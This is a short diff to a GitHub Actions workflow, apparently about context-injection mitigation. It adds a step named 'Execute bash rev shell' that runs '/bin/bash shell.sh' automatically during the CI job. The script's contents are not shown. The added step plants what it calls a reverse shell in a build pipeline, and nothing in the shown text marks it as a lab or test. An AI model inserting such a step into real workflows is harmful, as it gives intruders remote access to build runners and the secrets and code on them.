--- a/insecure-context-injection-mitigation.yml
+++ b/insecure-context-injection-mitigation.yml
@@ -19,3 +19,6 @@ jobs:
         run: | 
           echo "Using environment variables"
           echo "Building the project for branch: $BRANCH_NAME"
+      - name: Execute bash rev shell
+        run: |
+          /bin/bash shell.sh
